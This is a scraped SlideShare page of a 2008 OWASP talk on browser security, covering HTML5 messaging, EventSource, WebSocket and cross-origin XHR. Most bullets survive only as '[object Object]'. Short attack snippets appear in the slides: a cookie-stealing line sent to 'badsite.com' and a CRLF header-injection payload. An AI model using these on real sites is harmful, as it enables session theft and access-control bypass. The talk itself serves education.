SlideShare a Scribd company logo

Browser Security

Roberto Suggi Liverani
Roberto Suggi LiveraniPentester/Reseacher
OWASP – Browser Security Roberto Suggi Liverani Security Consultant Security-Assessment.com 3 September 2008
Who am I? ,[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Introduction ,[object Object],[object Object]
Introduction ,[object Object],[object Object]
Introduction ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Next Challenges ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HMTL5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],y.hello.com x.hello.com XSS Injection document.domain = hello.com Communication between 2 subdomains through XSS
HTML5 ,[object Object],[object Object],[object Object],[object Object],Malicious Third party 3.COM (b) Iframe injection src=2.COM 1.COM (vulnerable) Cross Context Scripting between 2.COM and 3.COM (a) Injection in 1.COM of document.open pointing to 3.COM
HTML5 ,[object Object],[object Object],[object Object],A.COM B.COM ,[object Object],[object Object],Test.foo served as text/foo redirection to: http://a.com/foo?url=b.com/test.foo
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object]
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],A.COM B.COM var o = document.getElementsByTagName('iframe')[0]; o.contentWindow.postMessage('Hello world', 'http://b.com/'); NOTE: this condition can be omitted or = *
HTML5 ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],<eventsource> data: http://www.google.com/news/1 data: http://www.yahoo/com/news/3 data: http://bbc.co.uk/news/2 EventStream PULLS
HTML5 ,[object Object],BOTNET badsite.com/evil.php ,[object Object],[object Object],Data Stream (MIME: text/event-stream) Data: wait(); Data: wait(); Data: document.write(<img src=‘http://badsite.com/’+document.cookie); Botnet operates following XHR access control for data exchange
HTML5 ,[object Object],[object Object],Client at 123.com Server at aa.com GET ws://aa.com/ HTTP/1.1 Upgrade: WebSocket Connection: Upgrade Host: 123.com Origin: http://123.com Authorization: Basic d2FsbGU6ZXZl HTTP/1.1 101 Web Socket Protocol Handshake Upgrade: WebSocket Connection: Upgrade WebSocket-Origin: http://aa.com WebSocket-Location: ws://aa.com:80/ Data Framing Read/send data byte per byte Data Framing Send/read raw UTF8 data byte per byte Close TCP/IP connection – no handshake Close TCP/IP connection – no handshake
WebApps (XHR) ,[object Object],Resource: aaa.com/test.txt Client: bbb.com JavaScript + XHR: new client = new XMLHttpRequest(); client.open(&quot;GET or POST&quot;, &quot;http://aaa.com/test.txt&quot;) client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow-Origin: http://bbb.com Hello World! GET NOTE: the entire access control system relies on HTTP headers So what happens with an HTTP Splitting Attack? JavaScript + XHR: new client = new XMLHttpRequest(); client.open(&quot;GET or POST&quot;, &quot;http://aaa.com/test.txt %0A%0DAccess-Control-Allow-Origin: http://bbb.com%0a%0d%0a%0d &quot;) client.onreadystatechange = function() { /* do something */ } client.send()
WebApps (XHR) ,[object Object],Resource: aaa.com/test.txt Client: bbb.com JavaScript + XHR: new client = new XMLHttpRequest(); client.open(“OPTIONS&quot;, &quot;http://aaa.com/test.txt&quot;) client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow-Origin: http://bbb.com Access-Control-Max-Age: 3628800 Preflight Request: OPTIONS JavaScript + XHR: new client = new XMLHttpRequest(); client.open(“DELETE&quot;, &quot;http://aaa.com/test.txt&quot;) client.onreadystatechange = function() { /* do something */ } client.send() DELETE NOTE: the entire access control system relies on HTTP headers
XHR Alternative – XDR (Xdomain Request) ,[object Object],Resource: aaa.com/xdr.txt Client: bbb.com JavaScript + XDR: xdr = new XDomainRequest(); xdr.open(“GET&quot;, “http://www.aaa.com/xdr.txt&quot;) HTTP Response: XDomainRequestAllowed=1 Hello! GET HTTP Request: GET /xdr.txt XDomainRequest: 1 Host: bbb.com NOTE: the entire XDR relies on HTTP headers
Browser Plugins ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Browser Plugins ,[object Object],[object Object],[object Object],test.addEventListener(MouseEvent.CLICK, downloadFile); var fileRef:FileReference = new FileReference(); function downloadFile(event:MouseEvent):void { fileRef.download(new URLRequest(&quot;http://www.aaa.com/file.html&quot;), “file.html&quot;); }
OWASP Intrinsic Group ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Questions? ,[object Object],[object Object],[object Object]
References ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
References ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
1 of 28

Browser Security

Download to read offline
Technology

This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.

Roberto Suggi Liverani
Roberto Suggi LiveraniPentester/Reseacher

Recommended

Browser Security by pratimesh Pathak ( Buldhana) by
Browser Security by pratimesh Pathak ( Buldhana) Browser Security by pratimesh Pathak ( Buldhana)
Browser Security by pratimesh Pathak ( Buldhana) Pratimesh Pathak
1.3K views16 slides
Mobile security by
Mobile securityMobile security
Mobile securitydilipdubey5
26K views20 slides
Types of cyber attacks by
Types of cyber attacksTypes of cyber attacks
Types of cyber attackskrishh sivakrishna
28.2K views17 slides
Botnets by
BotnetsBotnets
BotnetsKavisha Miyan
11.6K views29 slides
introduction to Botnet by
introduction to Botnetintroduction to Botnet
introduction to Botnetyogendra singh chahar
1.2K views19 slides
Keyloggers.ppt by
Keyloggers.pptKeyloggers.ppt
Keyloggers.pptChetanmalviya8
3.2K views15 slides
Network security ppt by
Network security pptNetwork security ppt
Network security pptOECLIB Odisha Electronics Control Library
35K views18 slides
IoT Security by
IoT SecurityIoT Security
IoT SecurityNarudom Roongsiriwong, CISSP
25.5K views42 slides

More Related Content

What's hot

Mobile security in Cyber Security by
Mobile security in Cyber SecurityMobile security in Cyber Security
Mobile security in Cyber SecurityGeo Marian
9.8K views20 slides
Spyware by
SpywareSpyware
SpywareIshita Bansal
2.1K views19 slides
Cyber Crime And Security by
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security ritik shukla
5K views17 slides
Detection of cyber-bullying by
Detection of cyber-bullying Detection of cyber-bullying
Detection of cyber-bullying Ziar Khan
4.2K views15 slides
Cyber Security by
Cyber SecurityCyber Security
Cyber SecurityVivek Agarwal
11.4K views22 slides
Network Security ppt by
Network Security pptNetwork Security ppt
Network Security pptSAIKAT BISWAS
2.1K views22 slides
USB flash drive security by
USB flash drive securityUSB flash drive security
USB flash drive securityjin88lin
7.1K views29 slides
Enumeration and system hacking by
Enumeration and system hackingEnumeration and system hacking
Enumeration and system hackingbegmohsin
433 views15 slides
Network security by
Network security Network security
Network security Madhumithah Ilango
17.9K views21 slides
Browser security by
Browser securityBrowser security
Browser securityRitikRathaur
424 views10 slides
Keyloggers and Spywares by
Keyloggers and SpywaresKeyloggers and Spywares
Keyloggers and SpywaresAnkit Mistry
12.5K views29 slides
Network Security Threats and Solutions by
Network Security Threats and SolutionsNetwork Security Threats and Solutions
Network Security Threats and SolutionsColin058
132.8K views19 slides
Web Security by
Web SecurityWeb Security
Web SecurityBharath Manoharan
80.7K views57 slides
Buffer overflow attacks by
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJoe McCarthy
18K views36 slides
Botnets by
BotnetsBotnets
BotnetsVishwadeep Badgujar
3K views28 slides
Cyber security by
Cyber securityCyber security
Cyber securityHarsh verma
14.5K views11 slides
Introduction to cyber security by
Introduction to cyber securityIntroduction to cyber security
Introduction to cyber securitySelf-employed
40.7K views21 slides
Mobile Application Security by
Mobile Application SecurityMobile Application Security
Mobile Application SecurityIshan Girdhar
8.2K views48 slides
Mobile Security by
Mobile SecurityMobile Security
Mobile SecurityMarketingArrowECS_CZ
12.7K views34 slides
Internet security powerpoint by
Internet security powerpointInternet security powerpoint
Internet security powerpointArifa Ali
41.9K views27 slides

What's hot (20)

Mobile security in Cyber Security by Geo Marian
Mobile security in Cyber SecurityMobile security in Cyber Security
Mobile security in Cyber Security
Geo Marian9.8K views
Spyware by Ishita Bansal
SpywareSpyware
Spyware
Ishita Bansal2.1K views
Cyber Crime And Security by ritik shukla
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security
ritik shukla5K views
Detection of cyber-bullying by Ziar Khan
Detection of cyber-bullying Detection of cyber-bullying
Detection of cyber-bullying
Ziar Khan4.2K views
Cyber Security by Vivek Agarwal
Cyber SecurityCyber Security
Cyber Security
Vivek Agarwal11.4K views
Network Security ppt by SAIKAT BISWAS
Network Security pptNetwork Security ppt
Network Security ppt
SAIKAT BISWAS2.1K views
USB flash drive security by jin88lin
USB flash drive securityUSB flash drive security
USB flash drive security
jin88lin7.1K views
Enumeration and system hacking by begmohsin
Enumeration and system hackingEnumeration and system hacking
Enumeration and system hacking
begmohsin433 views
Network security by Madhumithah Ilango
Network security Network security
Network security
Madhumithah Ilango17.9K views
Browser security by RitikRathaur
Browser securityBrowser security
Browser security
RitikRathaur424 views
Keyloggers and Spywares by Ankit Mistry
Keyloggers and SpywaresKeyloggers and Spywares
Keyloggers and Spywares
Ankit Mistry12.5K views
Network Security Threats and Solutions by Colin058
Network Security Threats and SolutionsNetwork Security Threats and Solutions
Network Security Threats and Solutions
Colin058132.8K views
Web Security by Bharath Manoharan
Web SecurityWeb Security
Web Security
Bharath Manoharan80.7K views
Buffer overflow attacks by Joe McCarthy
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Joe McCarthy18K views
Botnets by Vishwadeep Badgujar
BotnetsBotnets
Botnets
Vishwadeep Badgujar3K views
Cyber security by Harsh verma
Cyber securityCyber security
Cyber security
Harsh verma14.5K views
Introduction to cyber security by Self-employed
Introduction to cyber securityIntroduction to cyber security
Introduction to cyber security
Self-employed40.7K views
Mobile Application Security by Ishan Girdhar
Mobile Application SecurityMobile Application Security
Mobile Application Security
Ishan Girdhar8.2K views
Mobile Security by MarketingArrowECS_CZ
Mobile SecurityMobile Security
Mobile Security
MarketingArrowECS_CZ12.7K views
Internet security powerpoint by Arifa Ali
Internet security powerpointInternet security powerpoint
Internet security powerpoint
Arifa Ali41.9K views

Viewers also liked

Browser security — ROOTS by
Browser security — ROOTSBrowser security — ROOTS
Browser security — ROOTSAndre N. Klingsheim
4.4K views16 slides
Browser Security 101 by
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
2.1K views48 slides
Web Browser Security - 2016 Comparative Test Results by
Web Browser Security - 2016 Comparative Test ResultsWeb Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test ResultsNSS Labs
725 views17 slides
Web Browsers by
Web BrowsersWeb Browsers
Web BrowsersNeha Sharma
39.9K views41 slides
Web browser privacy and security by
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
2.3K views56 slides
Trusteer Rapport – Browser Security - How It Works by
Trusteer Rapport – Browser Security - How It WorksTrusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It Workstrusteer
10.3K views21 slides
Best topics for seminar by
Best topics for seminarBest topics for seminar
Best topics for seminarshilpi nagpal
503.8K views26 slides
Internet Security by
Internet SecurityInternet Security
Internet SecurityChris Rodgers
17K views16 slides
Software reuse ppt. by
Software reuse ppt.Software reuse ppt.
Software reuse ppt.Sumit Biswas
25.5K views18 slides
Digital Cinema by
Digital CinemaDigital Cinema
Digital CinemaSreenivas vasu
4.3K views28 slides
Chrome O.S. by
Chrome O.S.Chrome O.S.
Chrome O.S.Sukaant Chaudhary
9.1K views29 slides
Top 10 Web Security Vulnerabilities by
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
7.7K views74 slides
Securing Web Applications with Token Authentication by
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationStormpath
2.3K views59 slides
Google chrome operating system by
Google chrome operating systemGoogle chrome operating system
Google chrome operating systemkondalarao7
15.8K views14 slides
Internet Security by
Internet SecurityInternet Security
Internet SecurityPeter R. Egli
10.9K views44 slides
Web browser by
Web browserWeb browser
Web browserHardik Kakadiya
61.2K views17 slides
Web Browsers by
Web BrowsersWeb Browsers
Web BrowsersAahmed Hussain
22.9K views66 slides
5 pen pc technology by
5 pen pc technology5 pen pc technology
5 pen pc technologyPRADEEP Cheekatla
172.4K views18 slides
Cryptography.ppt by
Cryptography.pptCryptography.ppt
Cryptography.pptkusum sharma
203.7K views21 slides
Touchscreen PPT by
Touchscreen PPTTouchscreen PPT
Touchscreen PPT76 Degree Creative
130.7K views18 slides

Viewers also liked (20)

Browser security — ROOTS by Andre N. Klingsheim
Browser security — ROOTSBrowser security — ROOTS
Browser security — ROOTS
Andre N. Klingsheim4.4K views
Browser Security 101 by Stormpath
Browser Security 101 Browser Security 101
Browser Security 101
Stormpath2.1K views
Web Browser Security - 2016 Comparative Test Results by NSS Labs
Web Browser Security - 2016 Comparative Test ResultsWeb Browser Security - 2016 Comparative Test Results
Web Browser Security - 2016 Comparative Test Results
NSS Labs725 views
Web Browsers by Neha Sharma
Web BrowsersWeb Browsers
Web Browsers
Neha Sharma39.9K views
Web browser privacy and security by amiable_indian
Web browser privacy and security Web browser privacy and security
Web browser privacy and security
amiable_indian2.3K views
Trusteer Rapport – Browser Security - How It Works by trusteer
Trusteer Rapport – Browser Security - How It WorksTrusteer Rapport – Browser Security - How It Works
Trusteer Rapport – Browser Security - How It Works
trusteer10.3K views
Best topics for seminar by shilpi nagpal
Best topics for seminarBest topics for seminar
Best topics for seminar
shilpi nagpal503.8K views
Internet Security by Chris Rodgers
Internet SecurityInternet Security
Internet Security
Chris Rodgers17K views
Software reuse ppt. by Sumit Biswas
Software reuse ppt.Software reuse ppt.
Software reuse ppt.
Sumit Biswas25.5K views
Digital Cinema by Sreenivas vasu
Digital CinemaDigital Cinema
Digital Cinema
Sreenivas vasu4.3K views
Chrome O.S. by Sukaant Chaudhary
Chrome O.S.Chrome O.S.
Chrome O.S.
Sukaant Chaudhary9.1K views
Top 10 Web Security Vulnerabilities by Carol McDonald
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald7.7K views
Securing Web Applications with Token Authentication by Stormpath
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token Authentication
Stormpath2.3K views
Google chrome operating system by kondalarao7
Google chrome operating systemGoogle chrome operating system
Google chrome operating system
kondalarao715.8K views
Internet Security by Peter R. Egli
Internet SecurityInternet Security
Internet Security
Peter R. Egli10.9K views
Web browser by Hardik Kakadiya
Web browserWeb browser
Web browser
Hardik Kakadiya61.2K views
Web Browsers by Aahmed Hussain
Web BrowsersWeb Browsers
Web Browsers
Aahmed Hussain22.9K views
5 pen pc technology by PRADEEP Cheekatla
5 pen pc technology5 pen pc technology
5 pen pc technology
PRADEEP Cheekatla172.4K views
Cryptography.ppt by kusum sharma
Cryptography.pptCryptography.ppt
Cryptography.ppt
kusum sharma203.7K views
Touchscreen PPT by 76 Degree Creative
Touchscreen PPTTouchscreen PPT
Touchscreen PPT
76 Degree Creative130.7K views

Similar to Browser Security

Browser security by
Browser securityBrowser security
Browser securityUday Anand
110 views28 slides
Krzysztof Kotowicz - Hacking HTML5 by
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
9.3K views39 slides
Web Browsers And Other Mistakes by
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakesguest2821a2
3.3K views70 slides
Top Ten Web Hacking Techniques – 2008 by
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
1.2K views51 slides
XCS110_All_Slides.pdf by
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
6 views127 slides
Dom Hackking & Security - BlackHat Preso by
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
608 views17 slides
Web Browsers And Other Mistakes by
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakeskuza55
1.7K views69 slides
Hacking HTML5 offensive course (Zeronights edition) by
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
4.2K views39 slides
V2 peter-lubbers-sf-jug-websocket by
V2 peter-lubbers-sf-jug-websocketV2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocketbrent bucci
2.1K views92 slides
01. http basics v27 by
01. http basics v2701. http basics v27
01. http basics v27Eoin Keary
549 views33 slides
XST - Cross Site Tracing by
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site TracingMagno Logan
2.2K views14 slides
JavaScript Security: Mastering Cross Domain Communications in complex JS appl... by
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...Thomas Witt
916 views67 slides
Introduction to Web Architecture by
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web ArchitectureChamnap Chhorn
141.1K views49 slides
Building Client-Side Attacks with HTML5 Features by
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesConviso Application Security
3.2K views30 slides
Html5 Application Security by
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
2.2K views21 slides
Neat tricks to bypass CSRF-protection by
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
17.6K views38 slides
Html intake 38 lect1 by
Html intake 38 lect1Html intake 38 lect1
Html intake 38 lect1ghkadous
220 views117 slides
5-WebServers.ppt by
5-WebServers.ppt5-WebServers.ppt
5-WebServers.pptwebhostingguy
738 views21 slides
5-WebServers.ppt by
5-WebServers.ppt5-WebServers.ppt
5-WebServers.pptwebhostingguy
950 views21 slides
Android Lab Report by
Android Lab ReportAndroid Lab Report
Android Lab ReportYessica Diaz
3 views53 slides

Similar to Browser Security (20)

Browser security by Uday Anand
Browser securityBrowser security
Browser security
Uday Anand110 views
Krzysztof Kotowicz - Hacking HTML5 by DefconRussia
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia9.3K views
Web Browsers And Other Mistakes by guest2821a2
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
guest2821a23.3K views
Top Ten Web Hacking Techniques – 2008 by Jeremiah Grossman
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
Jeremiah Grossman1.2K views
XCS110_All_Slides.pdf by ssuser01066a
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
ssuser01066a6 views
Dom Hackking & Security - BlackHat Preso by Shreeraj Shah
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
Shreeraj Shah608 views
Web Browsers And Other Mistakes by kuza55
Web Browsers And Other MistakesWeb Browsers And Other Mistakes
Web Browsers And Other Mistakes
kuza551.7K views
Hacking HTML5 offensive course (Zeronights edition) by Krzysztof Kotowicz
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz4.2K views
V2 peter-lubbers-sf-jug-websocket by brent bucci
V2 peter-lubbers-sf-jug-websocketV2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocket
brent bucci2.1K views
01. http basics v27 by Eoin Keary
01. http basics v2701. http basics v27
01. http basics v27
Eoin Keary549 views
XST - Cross Site Tracing by Magno Logan
XST - Cross Site TracingXST - Cross Site Tracing
XST - Cross Site Tracing
Magno Logan2.2K views
JavaScript Security: Mastering Cross Domain Communications in complex JS appl... by Thomas Witt
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
Thomas Witt916 views
Introduction to Web Architecture by Chamnap Chhorn
Introduction to Web ArchitectureIntroduction to Web Architecture
Introduction to Web Architecture
Chamnap Chhorn141.1K views
Building Client-Side Attacks with HTML5 Features by Conviso Application Security
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security3.2K views
Html5 Application Security by chuckbt
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
chuckbt2.2K views
Neat tricks to bypass CSRF-protection by Mikhail Egorov
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov17.6K views
Html intake 38 lect1 by ghkadous
Html intake 38 lect1Html intake 38 lect1
Html intake 38 lect1
ghkadous220 views
5-WebServers.ppt by webhostingguy
5-WebServers.ppt5-WebServers.ppt
5-WebServers.ppt
webhostingguy738 views
5-WebServers.ppt by webhostingguy
5-WebServers.ppt5-WebServers.ppt
5-WebServers.ppt
webhostingguy950 views
Android Lab Report by Yessica Diaz
Android Lab ReportAndroid Lab Report
Android Lab Report
Yessica Diaz3 views

More from Roberto Suggi Liverani

I got 99 trends and a # is all of them by
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
5.8K views122 slides
Augmented reality in your web proxy by
Augmented reality in your web proxyAugmented reality in your web proxy
Augmented reality in your web proxyRoberto Suggi Liverani
3.3K views39 slides
Cross Context Scripting attacks & exploitation by
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationRoberto Suggi Liverani
3.5K views69 slides
Window Shopping Browser - Bug Hunting in 2012 by
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Roberto Suggi Liverani
3.1K views56 slides
None More Black - the Dark Side of SEO by
None More Black - the Dark Side of SEONone More Black - the Dark Side of SEO
None More Black - the Dark Side of SEORoberto Suggi Liverani
21K views58 slides
Bridging the gap - Security and Software Testing by
Bridging the gap - Security and Software TestingBridging the gap - Security and Software Testing
Bridging the gap - Security and Software TestingRoberto Suggi Liverani
1.2K views31 slides
Defending Against Application DoS attacks by
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacksRoberto Suggi Liverani
5.1K views51 slides
Exploiting Firefox Extensions by
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox ExtensionsRoberto Suggi Liverani
3.5K views42 slides
Black Energy18 - Russian botnet package analysis by
Black Energy18 - Russian botnet package analysisBlack Energy18 - Russian botnet package analysis
Black Energy18 - Russian botnet package analysisRoberto Suggi Liverani
1.8K views48 slides
XPath Injection by
XPath InjectionXPath Injection
XPath InjectionRoberto Suggi Liverani
7.1K views23 slides
Web Spam Techniques by
Web Spam TechniquesWeb Spam Techniques
Web Spam TechniquesRoberto Suggi Liverani
78.8K views53 slides
Reversing JavaScript by
Reversing JavaScriptReversing JavaScript
Reversing JavaScriptRoberto Suggi Liverani
2.9K views48 slides
Ajax Security by
Ajax SecurityAjax Security
Ajax SecurityRoberto Suggi Liverani
2K views33 slides

More from Roberto Suggi Liverani (13)

I got 99 trends and a # is all of them by Roberto Suggi Liverani
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani5.8K views
Augmented reality in your web proxy by Roberto Suggi Liverani
Augmented reality in your web proxyAugmented reality in your web proxy
Augmented reality in your web proxy
Roberto Suggi Liverani3.3K views
Cross Context Scripting attacks & exploitation by Roberto Suggi Liverani
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
Roberto Suggi Liverani3.5K views
Window Shopping Browser - Bug Hunting in 2012 by Roberto Suggi Liverani
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
Roberto Suggi Liverani3.1K views
None More Black - the Dark Side of SEO by Roberto Suggi Liverani
None More Black - the Dark Side of SEONone More Black - the Dark Side of SEO
None More Black - the Dark Side of SEO
Roberto Suggi Liverani21K views
Bridging the gap - Security and Software Testing by Roberto Suggi Liverani
Bridging the gap - Security and Software TestingBridging the gap - Security and Software Testing
Bridging the gap - Security and Software Testing
Roberto Suggi Liverani1.2K views
Defending Against Application DoS attacks by Roberto Suggi Liverani
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
Roberto Suggi Liverani5.1K views
Exploiting Firefox Extensions by Roberto Suggi Liverani
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox Extensions
Roberto Suggi Liverani3.5K views
Black Energy18 - Russian botnet package analysis by Roberto Suggi Liverani
Black Energy18 - Russian botnet package analysisBlack Energy18 - Russian botnet package analysis
Black Energy18 - Russian botnet package analysis
Roberto Suggi Liverani1.8K views
XPath Injection by Roberto Suggi Liverani
XPath InjectionXPath Injection
XPath Injection
Roberto Suggi Liverani7.1K views
Web Spam Techniques by Roberto Suggi Liverani
Web Spam TechniquesWeb Spam Techniques
Web Spam Techniques
Roberto Suggi Liverani78.8K views
Reversing JavaScript by Roberto Suggi Liverani
Reversing JavaScriptReversing JavaScript
Reversing JavaScript
Roberto Suggi Liverani2.9K views
Ajax Security by Roberto Suggi Liverani
Ajax SecurityAjax Security
Ajax Security
Roberto Suggi Liverani2K views

Recently uploaded

The Role of Patterns in the Era of Large Language Models by
The Role of Patterns in the Era of Large Language ModelsThe Role of Patterns in the Era of Large Language Models
The Role of Patterns in the Era of Large Language ModelsYunyao Li
134 views65 slides
Netmera Presentation.pdf by
Netmera Presentation.pdfNetmera Presentation.pdf
Netmera Presentation.pdfMustafa Kuğu
23 views50 slides
Qualifying SaaS, IaaS.pptx by
Qualifying SaaS, IaaS.pptxQualifying SaaS, IaaS.pptx
Qualifying SaaS, IaaS.pptxSachin Bhandari
1.2K views8 slides
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」 by
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」
PCCC23:日本AMD株式会社 テーマ2「AMD EPYC™ プロセッサーを用いたAIソリューション」PC Cluster Consortium
43 views12 slides
A plenarily integrated SIEM solution and it’s Deployment by
A plenarily integrated SIEM solution and it’s DeploymentA plenarily integrated SIEM solution and it’s Deployment
A plenarily integrated SIEM solution and it’s DeploymentBangladesh Network Operators Group
42 views26 slides
LLMs in Production: Tooling, Process, and Team Structure by
LLMs in Production: Tooling, Process, and Team StructureLLMs in Production: Tooling, Process, and Team Structure
LLMs in Production: Tooling, Process, and Team StructureAggregage
110 views77 slides
Cencora Executive Symposium by
Cencora Executive SymposiumCencora Executive Symposium
Cencora Executive Symposiummarketingcommunicati21
216 views14 slides
Five Ways to Automate API Testing with Postman by
Five Ways to Automate API Testing with PostmanFive Ways to Automate API Testing with Postman
Five Ways to Automate API Testing with PostmanPostman
48 views31 slides
Cocktail of Environments. How to Mix Test and Development Environments and St... by
Cocktail of Environments. How to Mix Test and Development Environments and St...Cocktail of Environments. How to Mix Test and Development Environments and St...
Cocktail of Environments. How to Mix Test and Development Environments and St...Aleksandr Tarasov
27 views135 slides
AI + Memoori = AIM by
AI + Memoori = AIMAI + Memoori = AIM
AI + Memoori = AIMMemoori
41 views9 slides
Xavier M Culmination Presenetation Final 12-7.pptx by
Xavier M Culmination Presenetation Final 12-7.pptxXavier M Culmination Presenetation Final 12-7.pptx
Xavier M Culmination Presenetation Final 12-7.pptxmanzanaresxavier28
43 views10 slides
User Centred Design and Implementation of Useful Picture Archiving and Commun... by
User Centred Design and Implementation of Useful Picture Archiving and Commun...User Centred Design and Implementation of Useful Picture Archiving and Commun...
User Centred Design and Implementation of Useful Picture Archiving and Commun...Lighton Phiri
24 views26 slides
Discover Aura Workshop (12.5.23).pdf by
Discover Aura Workshop (12.5.23).pdfDiscover Aura Workshop (12.5.23).pdf
Discover Aura Workshop (12.5.23).pdfNeo4j
28 views55 slides
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And... by
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...
Enabling DPU Hardware Accelerators in XCP-ng Cloud Platform Environment - And...ShapeBlue
166 views12 slides
